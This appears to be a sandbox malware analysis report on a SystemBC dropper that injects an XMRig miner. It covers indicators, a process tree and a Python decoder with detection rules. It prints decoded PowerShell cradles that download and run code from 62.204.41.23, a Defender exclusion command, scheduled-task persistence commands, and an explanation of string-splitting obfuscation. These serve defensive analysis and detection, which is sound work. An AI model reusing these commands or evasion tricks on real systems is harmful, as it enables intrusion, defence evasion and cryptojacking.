Analysis

max time kernel: 121s
max time network: 152s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 06/05/2023, 12:26
Static task: static1
Behavioral task: behavioral1 (sample file.exe, resource win7-20230220-en)
Behavioral task: behavioral2 (sample file.exe, resource win10v2004-20230220-en)

The signatures, process tree and memory dumps below are from behavioral1 (the Windows 7 x64 run); the behavioral2 (Windows 10) run is not reproduced on this page.
General

Target: file.exe
Size: 93KB
MD5: 97a78d084446851cb1e74b4bb2045f3a
SHA1: efdf7e05c2d0b7993d6f4ce6642f2f536116ad36
SHA256: e0e267a1da22b796f4f8a7b84a81d0f0a461183cdc03d267a75e34d9fc497ccd
SHA512: d81e584282ba21f5b821e6c237ab5aeb987b009d689eb503f1f7019bb7698f5345a43b470390521928ebb16ca9ac8b6876387fd3987a501ab129e8661d93df2c
SSDEEP: 1536:88bw0uWZGvOZnnlJ5t9UxrAwIVtdSDMvNcNIOOnQl+sb9m+dUs:bbhf5nj1wIvdSDMvNcNIObQso+d9
Malware Config

Extracted URLs (the three stage-two download cradles carried in the -enc PowerShell command lines in the process tree):
  http://62.204.41.23/o.png
  http://62.204.41.23/r.png
  http://62.204.41.23/file.png

Extracted family: systembc
  C2: 185.161.248.16:4440
Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess (7 IoCs)
  A process was created with its parent set to a PID other than the creator (parent-PID spoofing). Both dropped OneDrive.exe instances re-parented their children onto Explorer.EXE (PID 1244, procid_target 14), which is why cmd.exe, powershell.exe, schtasks.exe and conhost.exe appear directly under Explorer in the process tree.
  description             pid   process       procid_target  count
  PID 1624 created 1244   1624  OneDrive.exe  14             3
  PID 572 created 1244    572   OneDrive.exe  14             4

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoC)
  Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  dllhost.exe

XMRig Miner payload (11 IoCs)
  YARA rule xmrig matched these behavioral1 memory dumps:
  pid 572  (OneDrive.exe)  dump 141                                          0x000000013F7F0000-0x00000001401BA000
  pid 1316 (conhost.exe)   dumps 166, 172, 178, 182, 186, 190, 194, 198, 202, 206  0x0000000140000000-0x00000001407EF000
  The region in 1316 is an image mapped at 0x140000000, the default base for 64-bit PE executables, inside a conhost.exe that OneDrive.exe (PID 572) wrote to and set the thread context of (see WriteProcessMemory and SetThreadContext below). This is consistent with the miner being injected into a conhost.exe started by OneDrive.exe rather than run from a file on disk.

Blocklisted process makes network request (5 IoCs)
  flow  pid   process
  5     784   powershell.exe
  6     524   powershell.exe
  7     1328  powershell.exe
  10    1328  powershell.exe
  13    1328  powershell.exe
  These are the three powershell.exe instances whose -enc command lines fetch http://62.204.41.23/o.png, r.png and file.png (see the process tree).

Downloads MZ/PE file

Checks BIOS information in registry (2 TTPs, 2 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  dllhost.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   dllhost.exe

Executes dropped EXE (5 IoCs)
  pid   process       path
  1624  OneDrive.exe  C:\Users\Admin\AppData\Roaming\OneDrive.exe
  636   dllhost.exe   C:\Users\Admin\AppData\Roaming\dllhost.exe
  572   OneDrive.exe  C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe (launched by the OneDrive scheduled task via taskeng.exe)
  1180  lsass.exe     C:\Users\Admin\AppData\Roaming\lsass.exe
  784   lsass.exe     C:\ProgramData\lsass\lsass.exe
  None of these is the Windows binary of the same name; all of them live under the user profile or ProgramData. A dllhost.exe, lsass.exe or OneDrive.exe outside C:\Windows\System32 (or, for OneDrive, outside its Microsoft install location) is the thing to hunt for.

Identifies Wine through registry keys (2 TTPs, 1 IoC)
  Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
  Key opened  \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Wine  dllhost.exe

Loads dropped DLL (3 IoCs)
  pid   process
  1328  powershell.exe
  1712  taskeng.exe
  1180  lsass.exe

Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe"  lsass.exe
  Machine-wide Run key, so the value survives a user profile reset; note that it points at the ProgramData copy, not the Roaming copy that wrote it.

Drops file in System32 directory (2 IoCs)
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe  (x2)
  The unexpanded %ProgramData% under System32 is how the report renders powershell.exe touching its own Start Menu shortcut. This fires whenever powershell.exe runs and is not specific to this sample.

Suspicious use of NtSetInformationThreadHideFromDebugger (8 IoCs)
  pid   process      count
  636   dllhost.exe  1
  1180  lsass.exe    1
  784   lsass.exe    6

Suspicious use of SetThreadContext (2 IoCs)
  PID 572 (OneDrive.exe) set thread context of 1620 (conhost.exe, procid_target 60)
  PID 572 (OneDrive.exe) set thread context of 1316 (conhost.exe, procid_target 61)

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTPs, 3 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   process       command (from the process tree)
  928   schtasks.exe  /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
  1732  schtasks.exe  same command as 928
  1104  schtasks.exe  /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 14:31 /du 23:59 /sc daily /ri 1 /f
  The third task is a daily trigger with a 23:59 duration and a 1-minute repetition interval, i.e. it relaunches C:\ProgramData\lsass\lsass.exe every minute, all day. Both tasks are named OneDrive; the /tn collision means the later registration overwrites the earlier one (/f).

Delays execution with timeout.exe (1 IoC)
  pid 1716  timeout.exe  (timeout 7, run from C:\Users\Admin\AppData\Local\Temp\tmpE496.tmp.bat)

Suspicious behavior: EnumeratesProcesses (27 IoCs)
  pid   process         count
  524   powershell.exe  1
  1212  powershell.exe  1
  1328  powershell.exe  7
  784   powershell.exe  1
  1624  OneDrive.exe    6
  1416  powershell.exe  1
  636   dllhost.exe     1
  572   OneDrive.exe    8
  608   powershell.exe  1

Suspicious behavior: LoadsDriver (1 IoC)
  pid 464  Process not Found

Suspicious use of AdjustPrivilegeToken (18 IoCs)
  privilege              pid   process
  SeDebugPrivilege       524   powershell.exe
  SeDebugPrivilege       1212  powershell.exe
  SeDebugPrivilege       1328  powershell.exe
  SeDebugPrivilege       784   powershell.exe
  SeShutdownPrivilege    1368  powercfg.exe
  SeShutdownPrivilege    1732  powercfg.exe
  SeDebugPrivilege       1416  powershell.exe
  SeShutdownPrivilege    1716  powercfg.exe
  SeShutdownPrivilege    544   powercfg.exe
  SeShutdownPrivilege    752   powercfg.exe
  SeShutdownPrivilege    1376  powercfg.exe
  SeDebugPrivilege       608   powershell.exe
  SeShutdownPrivilege    1516  powercfg.exe
  SeShutdownPrivilege    1536  powercfg.exe
  SeLockMemoryPrivilege  1316  conhost.exe  (x2)
  SeDebugPrivilege       1180  lsass.exe
  SeDebugPrivilege       784   lsass.exe
  SeLockMemoryPrivilege in the injected conhost.exe is the large-page (huge pages) request XMRig makes; a genuine conhost.exe has no reason to enable it. SeShutdownPrivilege on powercfg.exe is normal for that tool.

Suspicious use of FindShellTrayWindow (60 IoCs)
  pid 1316  conhost.exe  (60 occurrences)

Suspicious use of SendNotifyMessage (60 IoCs)
  pid 1316  conhost.exe  (60 occurrences)

Suspicious use of SetWindowsHookEx (2 IoCs)
  pid 1180  lsass.exe
  pid 784   lsass.exe

Suspicious use of WriteProcessMemory (64 IoCs)
  writer pid  process         target pid  procid_target  count
  1348        file.exe        1212        27             3
  1348        file.exe        784         29             3
  1348        file.exe        1328        33             3
  1348        file.exe        524         31             3
  1328        powershell.exe  1624        35             3
  1104        cmd.exe         1368        40             3
  1104        cmd.exe         1732        41             3
  1104        cmd.exe         1716        42             3
  1104        cmd.exe         544         43             3
  1416        powershell.exe  928         44             3
  1328        powershell.exe  636         45             4
  1712        taskeng.exe     572         49             3
  1328        powershell.exe  1180        50             4
  1760        cmd.exe         752         55             3
  1760        cmd.exe         1376        56             3
  1760        cmd.exe         1516        57             3
  1760        cmd.exe         1536        58             3
  608         powershell.exe  1732        59             3
  572         OneDrive.exe    1620        60             1
  572         OneDrive.exe    1316        61             1
  1180        lsass.exe       1104        62             4
  1180        lsass.exe       784         64             2
  Three or four writes by a parent into a freshly created child is the ordinary process-start pattern throughout this report. The single writes by OneDrive.exe (572) into the two conhost.exe processes, paired with the SetThreadContext calls above, are the injection.
  Note on PIDs: Windows reused several PIDs within this run (1104 is both the schtasks.exe under lsass.exe and the cmd.exe powercfg wrapper; 784 is both a powershell.exe and the ProgramData lsass.exe; 1732 is both a powercfg.exe and a schtasks.exe; 1716 is both timeout.exe and a powercfg.exe; 752 is both a cmd.exe and a powercfg.exe). Correlate on procid_target or on the process tree, not on PID alone.

Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

Tree for behavioral1 as the sandbox recorded it. Indentation is the parent/child relation seen at creation time; because the dropped OneDrive.exe spoofs its parent (NtCreateUserProcessOtherParentProcess above), the cmd.exe, powershell.exe, schtasks.exe and conhost.exe entries sitting directly under Explorer.EXE were in fact started by OneDrive.exe (PIDs 1624 and 572). A "decoded" line is added under each -enc command line; -enc takes base64 of the UTF-16LE script text.

C:\Windows\Explorer.EXE  [PID 1244]
  cmdline: C:\Windows\Explorer.EXE

  C:\Users\Admin\AppData\Local\Temp\file.exe  [PID 1348]
    cmdline: "C:\Users\Admin\AppData\Local\Temp\file.exe"
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 1212]
      cmdline: "powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA
      decoded: Add-MpPreference -ExclusionPath C:\   (excludes the entire C: drive from Microsoft Defender scanning)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 784]
      cmdline: "powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
      decoded: $f5='bClient).Downlo'; $f1='(New-Object Net.We'; $f3='adString(''http://62.204.41.23/o.png'')';$GOO=I`E`X ($f1,$f5,$f3 -Join '')|I`E`X
      effective: IEX (New-Object Net.WebClient).DownloadString('http://62.204.41.23/o.png')
      The cradle is split into three string fragments, joined at run time, and IEX is written as I`E`X (backticks before non-escape letters are ignored by the tokenizer), so neither "DownloadString" nor "IEX" appears literally in the command line.
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 524]
      cmdline: "powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
      decoded: same construction as PID 784, URL http://62.204.41.23/r.png
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 1328]
      cmdline: "powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
      decoded: same construction as PID 784, URL http://62.204.41.23/file.png
      This is the instance that goes on to drop and start OneDrive.exe, dllhost.exe and lsass.exe below.
      - Blocklisted process makes network request
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\AppData\Roaming\OneDrive.exe  [PID 1624]
        cmdline: "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses

      C:\Users\Admin\AppData\Roaming\dllhost.exe  [PID 636]
        cmdline: "C:\Users\Admin\AppData\Roaming\dllhost.exe"
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious behavior: EnumeratesProcesses

      C:\Users\Admin\AppData\Roaming\lsass.exe  [PID 1180]
        cmdline: "C:\Users\Admin\AppData\Roaming\lsass.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Adds Run key to start application
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\schtasks.exe  [PID 1104]
          cmdline: "schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 14:31 /du 23:59 /sc daily /ri 1 /f
          - Creates scheduled task(s)

        C:\ProgramData\lsass\lsass.exe  [PID 784]
          cmdline: "C:\ProgramData\lsass\lsass.exe"
          - Executes dropped EXE
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx

        C:\Windows\SysWOW64\cmd.exe  [PID 752]
          cmdline: cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpE496.tmp.bat""

          C:\Windows\SysWOW64\timeout.exe  [PID 1716]
            cmdline: timeout 7
            - Delays execution with timeout.exe

  C:\Windows\System32\cmd.exe  [PID 1104]   (spoofed parent; started by OneDrive.exe)
    cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    Sets the hibernate and standby timeouts to 0 (never) on both AC and battery so the host stays awake for mining.
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\powercfg.exe  [PID 1368]   powercfg /x -hibernate-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\powercfg.exe  [PID 1732]   powercfg /x -hibernate-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\powercfg.exe  [PID 1716]   powercfg /x -standby-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\powercfg.exe  [PID 544]    powercfg /x -standby-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 1416]   (spoofed parent; started by OneDrive.exe)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
    Registers an at-logon task with the highest run level. Below Windows 8 (OS version 6.2) it shells out to schtasks.exe, otherwise it uses the ScheduledTasks module; on this Windows 7 host the schtasks.exe branch ran. The <#uxwihwxmk#> comment is random filler.
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\schtasks.exe  [PID 928]
      cmdline: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
      - Creates scheduled task(s)

  C:\Windows\System32\schtasks.exe  [PID 1724]   (spoofed parent; started by OneDrive.exe)
    cmdline: C:\Windows\System32\schtasks.exe /run /tn "OneDrive"
    Triggers the task immediately; taskeng.exe (PID 1712) then launches the OneDrive\OneDrive.exe copy as PID 572.

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 608]   (spoofed parent; started by OneDrive.exe)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
    Same registration script as PID 1416, re-run by the second OneDrive.exe instance.
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\schtasks.exe  [PID 1732]
      cmdline: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
      - Creates scheduled task(s)

  C:\Windows\System32\cmd.exe  [PID 1760]   (spoofed parent; started by OneDrive.exe)
    cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\powercfg.exe  [PID 752]    powercfg /x -hibernate-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\powercfg.exe  [PID 1376]   powercfg /x -hibernate-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\powercfg.exe  [PID 1516]   powercfg /x -standby-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\powercfg.exe  [PID 1536]   powercfg /x -standby-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\conhost.exe  [PID 1620]   (spoofed parent; created by OneDrive.exe PID 572, which wrote to it and set its thread context)
    cmdline: C:\Windows\System32\conhost.exe

  C:\Windows\System32\conhost.exe  [PID 1316]   (spoofed parent; created by OneDrive.exe PID 572, which wrote to it and set its thread context; xmrig YARA hits on its memory)
    cmdline: C:\Windows\System32\conhost.exe
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage

C:\Windows\system32\taskeng.exe  [PID 1712]
  cmdline: taskeng.exe {0A48622A-5667-4087-A42B-C478C83A7A89} S-1-5-21-1283023626-844874658-3193756055-1000:THEQWNRW\Admin:Interactive:[1]
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe  [PID 572]
    cmdline: C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
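The -enc arguments above are opaque until decoded, and even the decoded o.png/r.png/file.png scripts hide the download cradle by splitting it across three variables and joining them at run time. The script below is an added example for this report, not Triage's code and not the sample's: it decodes the four encoded command lines copied from the tree, strips the I`E`X backticks, reassembles the -Join fragments, and runs a handful of rules over the result, with the two plain powercfg and schtasks lines included for comparison. The rule names and the reassembly logic are constructed here for illustration; everything else is taken from the tree.

```python
"""Decode and triage the command lines from the process tree above.

Added example for this report; it is not Triage's code and not the sample's.
The -enc arguments and plain command lines are copied from the tree; the rule
names and the helper logic are constructed here for illustration.
"""
import base64
import re
from typing import Optional

# (pid, command line or -enc argument, is_encoded), copied from the process tree.
SAMPLE_CMDLINES = [
    (1212, "IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA", True),
    (784, "JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==", True),
    (524, "JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==", True),
    (1328, "JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==", True),
    (1104, "cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 "
           "& powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0", False),
    (928, r'"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive '
          r"/tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'", False),
]

URL_RE = re.compile(r"https?://[^\s'\"()]+")
# $name='value' where '' inside the value is an escaped single quote.
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'")
# ($a,$b,$c -Join '') : the list of variables in concatenation order.
JOIN_RE = re.compile(r"\(\s*((?:\$\w+\s*,\s*)+\$\w+)\s+-Join\s+''\s*\)", re.I)

# One rule per behaviour the signatures above describe; the names are ours.
RULES = [(name, re.compile(rx, re.I)) for name, rx in [
    ("defender_exclusion", r"Add-MpPreference\s+-ExclusionPath"),
    ("download_cradle", r"Net\.WebClient\)\.DownloadString\("),
    ("iex_pipe", r"\|\s*IEX\b"),
    ("disable_sleep", r"powercfg\s+/x\s+-(?:hibernate|standby)-timeout-(?:ac|dc)\s+0\b"),
    ("schtask_highest", r"schtasks(?:\.exe)?\"?\s+/create\b.*\s/rl\s+highest\b"),
    ("task_in_user_writable_dir", r"/tr\s+['\"]*C:\\(?:Users\\[^\\]+\\AppData|ProgramData)\\"),
]]


def decode_enc(arg: str) -> str:
    """powershell -enc / -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64decode(arg).decode("utf-16-le")


def strip_backticks(script: str) -> str:
    """A backtick before a letter that is not an escape sequence is dropped by the
    PowerShell tokenizer, so I`E`X reads as IEX. Sufficient for the form seen here."""
    return re.sub(r"`(?=[A-Za-z])", "", script)


def reassemble_join(script: str) -> Optional[str]:
    """Rebuild a string the script splits across $vars and glues with (-Join '')."""
    parts = {name: val.replace("''", "'") for name, val in ASSIGN_RE.findall(script)}
    m = JOIN_RE.search(script)
    if not m:
        return None
    order = re.findall(r"\$(\w+)", m.group(1))
    if any(name not in parts for name in order):
        return None
    return "".join(parts[name] for name in order)


def triage_cmdline(pid: int, cmdline: str, encoded: bool) -> dict:
    script = strip_backticks(decode_enc(cmdline)) if encoded else cmdline
    joined = reassemble_join(script)
    # Match rules against the decoded text *and* the reassembled string: the
    # download cradle is invisible until the three fragments are joined.
    effective = script if joined is None else script + "\n" + joined
    return {
        "pid": pid,
        "decoded": script,
        "reassembled": joined,
        "urls": list(dict.fromkeys(URL_RE.findall(effective))),
        "hits": [name for name, rx in RULES if rx.search(effective)],
    }


def triage_all(samples=SAMPLE_CMDLINES):
    return [triage_cmdline(pid, line, enc) for pid, line, enc in samples]


if __name__ == "__main__":
    for r in triage_all():
        print(f"PID {r['pid']}: hits={r['hits']} urls={r['urls']}")
        print("   decoded:    ", r["decoded"].strip())
        if r["reassembled"]:
            print("   reassembled:", r["reassembled"])
```

Run as-is it prints one block per PID. The point worth noticing is the download_cradle rule: it never matches the decoded text of PIDs 784, 524 and 1328 on its own, because "DownloadString" only exists once $f1, $f5 and $f3 are concatenated; a detection that keys on the literal string in the command line, or even in the decoded script, misses this sample, while one that also evaluates the joined form catches all three.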
Network
MITRE ATT&CK Enterprise v6
Downloads

Dropped files listed by the report. The report repeats a hash once per drop event; the repeats are collapsed here and the path is shown only where the report gives one.

1.7MB (path not shown)
  MD5: eb85c562249e96d7a946111241f0ea4b
  SHA1: 5c89db5dad53c26ec1f8189261a7fc4eace18773
  SHA256: 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
  SHA512: ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

154B (path not shown)
  MD5: 5dfdd62dd713e9d2a39aa8bc066a7299
  SHA1: f7f2e041d2ee5eb1b91556bd287af269d57549fa
  SHA256: f13bb14edd93b4008da8c918eac1bb0fa456e0afce1c1b8773c65d997a64cc9f
  SHA512: 8d5d001c3fae2b7957430cee6a9211a9e2d744682d8e702b3f28588b41a3829784f928417509baa6c6ff7e812d37d7a9597222f19983e4d7b87d620751245177

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms, 7KB
  MD5: b28e8a3a72b5b129bfe9682c90c3477c
  SHA1: 8dd9ab2f66af7517220175b7a001375e8722b4c2
  SHA256: d5ff1d469b81efb6c98b0933ad55db996cad1d3268f231c8272f5f375797a28f
  SHA512: 5ef1074169a297504d588b4a7aa0b9e3f9d4cc9f87552d99c03b8638d72befc759219899850e3826870514a2827da8b3a49cfe46d2ff5e37089f1b089a68685e
  (Jump-list entry written by powershell.exe when it runs; a side effect of the PowerShell activity, not a payload.)

9.8MB (path not shown)
  MD5: 743022328f955e2cbb5f2f375bd0ab72
  SHA1: 226a731c638cf6e79b92cc2bb6369b04e6a98b55
